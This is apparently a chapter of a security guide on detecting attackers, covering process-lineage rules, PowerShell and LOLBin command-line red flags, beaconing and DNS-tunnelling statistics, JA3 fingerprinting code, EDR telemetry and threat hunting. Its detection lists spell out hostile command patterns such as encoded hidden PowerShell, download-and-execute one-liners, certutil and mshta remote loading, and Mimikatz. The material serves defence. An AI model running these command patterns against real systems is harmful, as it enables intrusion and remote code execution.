Detection Strategies: Catching Attackers

Understanding offensive techniques lets you build better defenses. This section covers how defenders can detect the techniques described in this guide.

The Detection Challenge

Sophisticated attackers design their operations to evade detection:

  • Traffic blends with legitimate business activity
  • Tools are Microsoft-signed binaries (LOLBins)
  • Activity happens in short bursts, not continuously
  • Encryption hides content from inspection
  • Infrastructure uses legitimate cloud services

Detection requires looking beyond simple signatures. It's about behavioral analysis, anomaly detection, and understanding what "normal" looks like.

Behavioral Detection

Instead of looking for specific malware, look for suspicious behaviors.

Process Lineage Analysis

The single most powerful detection technique: track parent-child process relationships.

Normal vs. Suspicious Process Trees
NORMAL PROCESS TREE:                    SUSPICIOUS PROCESS TREE:
═══════════════════                     ═══════════════════════

explorer.exe                            outlook.exe
    └─ chrome.exe                           └─ cmd.exe
           └─ chrome.exe (render)                   └─ powershell.exe
                                                            └─ certutil.exe

User clicks Chrome icon,                Email client spawning shells?
Chrome spawns render processes.         PowerShell downloading files?
Expected behavior.                      HIGHLY SUSPICIOUS.

winword.exe                             excel.exe
    └─ (no children normally)               └─ mshta.exe
                                                   └─ powershell.exe

Word opened, user editing document.     Excel spawning HTA then PowerShell?
No child processes.                     ALMOST CERTAINLY MALICIOUS.
Expected behavior.

Key Detection Rules

Parent Process                      | Suspicious Child                 | Why Suspicious
------------------------------------|----------------------------------|--------------------------------
outlook.exe, winword.exe, excel.exe | cmd.exe, powershell.exe          | Office apps rarely spawn shells
Any Office app                      | wmic.exe, mshta.exe              | Macro execution indicator
explorer.exe                        | powershell.exe with -enc         | Direct encoded execution
wmiprvse.exe                        | powershell.exe, cmd.exe          | WMI-based remote execution
services.exe                        | Unusual services spawning shells | Persistence mechanism

Command Line Analysis

Even legitimate tools become suspicious with certain arguments.

PowerShell Red Flags

# High-confidence malicious indicators:

-enc, -EncodedCommand     # Base64 encoded command
-ep bypass                # Execution policy bypass
-w hidden                 # Hidden window
-nop, -NoProfile          # Skip profile loading
-noni, -NonInteractive    # No interactive prompts

DownloadString            # Downloading code from URL
IEX, Invoke-Expression    # Executing downloaded code
Net.WebClient             # Web downloading class
FromBase64String          # Decoding operations
Invoke-Mimikatz           # Credential dumping (duh)

# Combination rule (very high confidence):
powershell.exe -ep bypass -w hidden -enc [base64...]
# This is almost NEVER legitimate

LOLBin Abuse Patterns

# certutil.exe
certutil -urlcache -f http    # Downloading files
certutil -decode              # Decoding payloads

# mshta.exe
mshta http://                 # Loading remote HTAs
mshta vbscript:               # Inline script execution
mshta javascript:             # Inline script execution

# bitsadmin.exe
bitsadmin /transfer           # Downloading files
bitsadmin /setnotifycmdline   # Command execution on complete

# wmic.exe
/node:                        # Remote execution
process call create           # Process creation
/format:http                  # Loading remote XSL

# rundll32.exe
javascript:                   # Script execution
shell32.dll,ShellExec_RunDLL  # Executing URLs
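The lineage rules and the command-line red flags above can be combined into one scoring pass over process-creation telemetry. This is an added example in Python, not code from the original guide; the sample events, rule weights and alert threshold are constructed for illustration, and the regexes cover only the abbreviations listed above.

```python
import re

# Constructed sample events (parent image, child image, command line), not real telemetry.
EVENTS = [
    ("explorer.exe", "chrome.exe", "chrome.exe --type=renderer"),
    ("outlook.exe", "cmd.exe", "cmd.exe /c powershell.exe -ep bypass -w hidden -enc SQBFAFgAIAAo"),
    ("excel.exe", "mshta.exe", 'mshta.exe vbscript:Execute("x")'),
    ("wmiprvse.exe", "powershell.exe",
     "powershell.exe -nop -noni -c IEX (New-Object Net.WebClient).DownloadString('http://x/a')"),
    ("explorer.exe", "certutil.exe", "certutil -urlcache -f http://x/a.txt a.txt"),
]

OFFICE = {"outlook.exe", "winword.exe", "excel.exe"}
# Parent/child pairs from the Key Detection Rules table: (parents, children, reason).
LINEAGE_RULES = [
    (OFFICE, {"cmd.exe", "powershell.exe"}, "Office app spawning a shell"),
    (OFFICE, {"wmic.exe", "mshta.exe"}, "Office app spawning macro LOLBin"),
    ({"wmiprvse.exe"}, {"cmd.exe", "powershell.exe"}, "WMI-based remote execution"),
]
# Command-line red flags from the lists above: (regex, weight, reason). Weights are
# illustrative starting points, not a published scoring scheme.
CMDLINE_RULES = [
    (r"(?i)(^|\s)-e(c|nc|ncodedcommand)?\b", 3, "encoded PowerShell command"),
    (r"(?i)-ep\s+bypass", 2, "execution policy bypass"),
    (r"(?i)-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"(?i)-no(p|profile|ni|ninteractive)\b", 1, "no profile / non-interactive"),
    (r"(?i)downloadstring|net\.webclient|\biex\b|invoke-expression", 3, "download-and-execute"),
    (r"(?i)certutil.*-urlcache", 3, "certutil download"),
    (r"(?i)mshta\S*\s+(https?:|vbscript:|javascript:)", 3, "mshta remote or inline script"),
]

def score_event(parent, child, cmdline):
    """Score one process-creation event; returns (score, reasons)."""
    score, reasons = 0, []
    for parents, children, reason in LINEAGE_RULES:
        if parent.lower() in parents and child.lower() in children:
            score += 3
            reasons.append(reason)
    for pattern, weight, reason in CMDLINE_RULES:
        if re.search(pattern, cmdline):
            score += weight
            reasons.append(reason)
    return score, reasons

def triage(events, threshold=3):
    """Events scoring at or above threshold, highest first: [(score, reasons, event)]."""
    scored = [score_event(*e) + (e,) for e in events]
    return sorted([s for s in scored if s[0] >= threshold], key=lambda s: -s[0])
```

Lineage and command-line hits are additive, so an Office-spawned encoded, hidden PowerShell outscores a lone certutil download even though both cross the threshold.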

Network-Based Detection

Beaconing Detection

Even with jitter, beaconing creates statistical patterns over time.

# Collect connection data over 7+ days

For each (source_ip, destination) pair:
    Calculate:
    - Connection count
    - Mean interval between connections
    - Standard deviation of intervals
    - Coefficient of variation (StdDev / Mean)

# Beaconing indicators:
- High connection count to single destination
- Relatively consistent intervals (low CoV despite jitter)
- Connections during non-business hours
- 24/7 connectivity pattern
- First-ever connection to this destination
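The interval statistics described above, as an added Python example that is not part of the original guide: it generates a constructed week of flow records (a jittered 60-second beacon beside bursty browsing), then computes count, mean, standard deviation and coefficient of variation per (source, destination) pair. The min_count and max_cov thresholds are assumptions to tune per environment.

```python
import random
import statistics
from collections import defaultdict

def make_beacon(start, count, period, jitter_pct, seed=1):
    """Constructed C2-style timestamps: fixed period with +/- jitter_pct (seconds)."""
    rng, t, out = random.Random(seed), start, []
    for _ in range(count):
        out.append(t)
        t += period * (1 + rng.uniform(-jitter_pct, jitter_pct) / 100)
    return out

def make_browsing(start, count, mean_gap=900, seed=2):
    """Constructed human browsing: bursty, exponentially distributed gaps."""
    rng, t, out = random.Random(seed), start, []
    for _ in range(count):
        out.append(t)
        t += rng.expovariate(1 / mean_gap)
    return out

def interval_stats(timestamps):
    """Count, mean gap, stddev and coefficient of variation for one (src, dst) pair."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return {"count": len(ts), "mean": None, "stdev": None, "cov": None}
    mean, sd = statistics.mean(gaps), statistics.stdev(gaps)
    return {"count": len(ts), "mean": mean, "stdev": sd, "cov": sd / mean if mean else None}

def find_beacons(flows, min_count=50, max_cov=0.3):
    """flows: iterable of (src, dst, ts). Returns pairs whose gaps stay regular
    (low CoV) despite jitter; thresholds are starting points to tune per environment."""
    by_pair = defaultdict(list)
    for src, dst, ts in flows:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, ts in by_pair.items():
        s = interval_stats(ts)
        if s["count"] >= min_count and s["cov"] is not None and s["cov"] <= max_cov:
            hits[pair] = s
    return hits

# Constructed 7-day flow log: a 60 s beacon with 20% jitter beside ordinary browsing.
WEEK = 7 * 24 * 3600
FLOWS = [("10.0.0.15", "203.0.113.7", t) for t in make_beacon(0, WEEK // 60, 60, 20)]
FLOWS += [("10.0.0.15", "198.51.100.20", t) for t in make_browsing(0, 2000)]
```

Uniform jitter of +/-20% yields a CoV near 0.12, while human-driven traffic sits near 1.0, which is why the statistic survives jitter.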

JA3 Fingerprinting

TLS handshakes create unique fingerprints. Known C2 tools have known JA3 hashes.

# JA3 = MD5(SSLVersion,Ciphers,Extensions,EllipticCurves,ECPointFormats)

Known malicious JA3 hashes (examples - these change):
- Cobalt Strike: 72a589da586844d7f0818ce684948eea
- Metasploit: 3b5074b1b5d032e5620f69f9f700ff0e
- Empire: 1aa7bf8b97e540ca5edd75f7b8384bfa

# Detection:
1. Capture TLS handshakes at network edge
2. Calculate JA3 hash for each connection
3. Compare against threat intel JA3 lists
4. Alert on matches
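The JA3 computation above, as an added Python example rather than code from the original guide or from any JA3 library: it parses a TLS ClientHello record, drops GREASE values (which change on every handshake and would otherwise break the fingerprint), and builds the comma- and dash-separated string before hashing. The ClientHello bytes are constructed by the helper so the block runs offline.

```python
import hashlib

# GREASE values (RFC 8701) are randomised per handshake, so JA3 drops them before hashing.
GREASE = {(g << 8) | g for g in range(0x0A, 0x100, 0x10)}

def u16(buf, off=0):
    return int.from_bytes(buf[off:off + 2], "big")
def id_list(buf):
    """Decode a run of 2-byte big-endian ids, dropping GREASE."""
    return [v for v in (u16(buf, i) for i in range(0, len(buf), 2)) if v not in GREASE]

def ja3_from_client_hello(record):
    """Parse one well-formed TLS ClientHello record (bytes) into (ja3_string, ja3_md5)."""
    assert record[0] == 0x16 and record[5] == 0x01, "not a ClientHello record"
    version, p = u16(record, 9), 9 + 2 + 32     # past record/handshake headers, version, random
    p += 1 + record[p]                          # session_id
    ciphers = id_list(record[p + 2:p + 2 + u16(record, p)])
    p += 2 + u16(record, p)
    p += 1 + record[p]                          # compression_methods
    ext_end, p = p + 2 + u16(record, p), p + 2
    exts, curves, fmts = [], [], []
    while p < ext_end:
        etype, elen = u16(record, p), u16(record, p + 2)
        body = record[p + 4:p + 4 + elen]
        p += 4 + elen
        if etype in GREASE:
            continue
        exts.append(etype)
        if etype == 10:                         # supported_groups: 2-byte length, then ids
            curves = id_list(body[2:2 + u16(body)])
        elif etype == 11:                       # ec_point_formats: 1-byte length, then bytes
            fmts = list(body[1:1 + body[0]])
    s = ",".join([str(version)] + ["-".join(map(str, x)) for x in (ciphers, exts, curves, fmts)])
    return s, hashlib.md5(s.encode()).hexdigest()

def build_client_hello(version, ciphers, extensions):
    """Constructed ClientHello for the example; extensions is [(type, body_bytes)]."""
    be = lambda v, width=2: v.to_bytes(width, "big")
    body = be(version) + bytes(32) + b"\x00"                  # version, random, empty session id
    body += be(2 * len(ciphers)) + b"".join(be(c) for c in ciphers)
    body += b"\x01\x00"                                        # one compression method: null
    ext = b"".join(be(t) + be(len(b)) + b for t, b in extensions)
    body += be(len(ext)) + ext
    hs = b"\x01" + be(len(body), 3) + body
    return b"\x16\x03\x01" + be(len(hs)) + hs
# Sample handshake with GREASE in the cipher, extension and group lists (constructed).
SAMPLE = build_client_hello(0x0303, [0x0A0A, 0x1301, 0x1302, 0xC02B], [
    (0x0A0A, b""),
    (10, b"\x00\x06\x1A\x1A\x00\x1D\x00\x17"),   # supported_groups: GREASE, x25519, secp256r1
    (11, b"\x01\x00"),                           # ec_point_formats: uncompressed
    (43, b"\x02\x03\x04"),                       # supported_versions: TLS 1.3
])
```

The resulting hex digest is what gets compared against threat-intel lists such as the one above; comparing the raw string instead makes it easier to see which field caused a near-miss.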

DNS Analytics

# Indicators of DNS tunneling:

1. High volume of queries to single domain
   Normal: 10-50 queries/day to google.com
   Suspicious: 10,000 queries/day to weird-domain.com

2. Long subdomain strings (encoded data)
   Normal: www.example.com
   Suspicious: dGhpcyBpcyBlbmNvZGVkIGRhdGE.evil.com (base64)

3. High entropy in subdomains
   Normal: mail, www, api (low entropy, readable)
   Suspicious: x8kf92mdk3 (high entropy, random-looking)

4. TXT record queries
   Normal: Rare from workstations
   Suspicious: Many TXT queries from single host

5. Queries to newly registered domains
   Domains < 30 days old are suspicious

Network Baseline Comparison

# Build baseline for each host/user:

Host: WORKSTATION-15
User: jsmith
Normal destinations: office365.com, salesforce.com, slack.com
Normal hours: 9am-6pm
Normal volume: 50-200MB/day
Normal protocols: HTTP, HTTPS, DNS

# Alert on deviations:
□ New destination never seen before
□ Destination not seen elsewhere in org
□ Traffic during unusual hours (3am?)
□ Traffic while user is on vacation
□ Unusual volume (2GB upload overnight?)
□ Unusual protocol (SSH from workstation?)

Endpoint Detection (EDR)

Modern EDR watches behavior, not just signatures.

Critical Telemetry Sources

Data Source            | What It Captures                                | What It Detects
-----------------------|-------------------------------------------------|---------------------------------------
Process Creation       | Every process start: parent, command line, user | Suspicious process trees, LOLBin abuse
Script Block Logging   | Decoded PowerShell before execution             | Encoded commands, AMSI bypasses
Network Connections    | Process-to-destination mapping                  | Unusual processes making connections
File Creation          | New files written to disk                       | Dropped payloads, staging
Registry Modifications | Registry key changes                            | Persistence mechanisms
Module Loads           | DLLs loaded by processes                        | DLL sideloading, injection

Enabling PowerShell Logging

# Group Policy settings to enable:

Computer Configuration
  → Administrative Templates
    → Windows Components
      → Windows PowerShell

1. Turn on Module Logging
   Log modules: *

2. Turn on Script Block Logging
   Log script block invocation start/stop events: Enabled

3. Turn on PowerShell Transcription
   Transcript output directory: \\server\share\transcripts
   Include invocation headers: Enabled

# These settings capture:
- Every PowerShell command executed
- Decoded commands (even -enc ones!)
- Full script contents
- Who ran what, when, where

Script block events are written to the Microsoft-Windows-PowerShell/Operational log as Event ID 4104 (module logging writes Event ID 4103), so forward that channel to the SIEM or the logging does nothing for detection.

Key Questions Defenders Should Ask

From the Conversation

These are the detection-focused questions raised earlier, with detailed answers.

How do defenders detect beaconing over HTTPS to legitimate domains?

You can't see inside the encryption, but you can see:

  • Timing patterns: Statistical analysis reveals periodicity despite jitter
  • JA3/JA3S fingerprints: TLS handshake parameters identify specific tools
  • Request/response ratios: C2 often has unusual symmetry vs. normal browsing
  • Connection frequency: Regular connections to "new" domains
  • DNS analytics: Resolving domains registered recently

What does "normal" look like and how do you baseline?

Building baselines requires:

  • NetFlow/IPFIX data: Every connection logged (src, dst, port, bytes, duration)
  • UEBA: User and Entity Behavior Analytics building per-host/per-user profiles
  • Application inventory: Know which apps should phone home where
  • Time: Takes weeks/months to build good baselines

Once baselined, new C2 infrastructure stands out because it's new.

What metadata gives attackers away without TLS inspection?

  • Certificate details: Self-signed? Issued yesterday? Subject mismatch?
  • Destination IP reputation: Threat intel feeds, passive DNS history
  • Timing: Long connections or precise interval reconnections
  • Volume: Large uploads during unusual hours
  • Server Name Indication (SNI): Mismatches between SNI and actual content

How does EDR detect living off the land?

This is hard, which is why LOLBins work. But EDR looks at:

  • Process lineage: Abnormal parent-child relationships
  • Command-line arguments: Known malicious patterns
  • Behavior sequences: rundll32 making network connections, mshta running scripts
  • Script Block Logging: Captures decoded PowerShell before execution
  • Rare events: certutil downloading files is almost never legitimate

Threat Hunting

Proactive searching for compromise indicators, rather than waiting for alerts.

Hunting Hypotheses

# Hypothesis-driven hunts:

Hypothesis: "Attackers are using scheduled tasks for persistence"
Hunt:
- Query all scheduled tasks across endpoints
- Filter for tasks created in last 30 days
- Filter for tasks running PowerShell, cmd, mshta, wscript
- Review command lines for suspicious patterns
- Check if task creator matches expected admin processes

Hypothesis: "Beaconing is occurring over HTTPS to cloud services"
Hunt:
- Aggregate connections to AWS/Azure/GCP/Cloudflare IPs
- Look for hosts with unusually high connection counts
- Look for connections with regular intervals
- Cross-reference with known good application list

Hypothesis: "Credential dumping has occurred via LSASS access"
Hunt:
- Search for processes accessing lsass.exe memory
- Filter out known legitimate (AV, security tools)
- Look for unknown processes or tools like mimikatz
- Check for suspicious process lineage

IOC Sweeps

# When new threat intel arrives, sweep the environment:

New IOC received: malicious domain cdn-analytics-prod.com

Sweep actions:
1. Query DNS logs for any resolution of this domain
2. Query proxy logs for any connection to this domain
3. Query endpoint telemetry for network connections to this domain
4. Query SIEM for any historical references

If found:
- Identify affected hosts
- Capture forensic images
- Investigate scope of compromise
- Begin incident response

Detection Tools

Category     | Examples                                                      | Use Case
-------------|---------------------------------------------------------------|---------------------------------------
SIEM         | Splunk, Elastic, Microsoft Sentinel                           | Log aggregation, correlation, alerting
EDR          | CrowdStrike, Carbon Black, SentinelOne, Defender for Endpoint | Endpoint behavior monitoring
NDR          | Zeek, Suricata, Darktrace, ExtraHop                           | Network traffic analysis
Threat Intel | MISP, OpenCTI, ThreatConnect                                  | IOC management, sharing
Hunting      | Velociraptor, OSQuery                                         | Endpoint querying at scale

Detection Summary

Key Principles
  • Know your baseline: You can't detect anomalies without knowing normal
  • Watch behavior, not just signatures: LOLBins require behavioral detection
  • Collect everything: You can't query logs you didn't capture
  • Think like an attacker: Understanding offense enables better defense
  • Assume breach: Detection matters because prevention eventually fails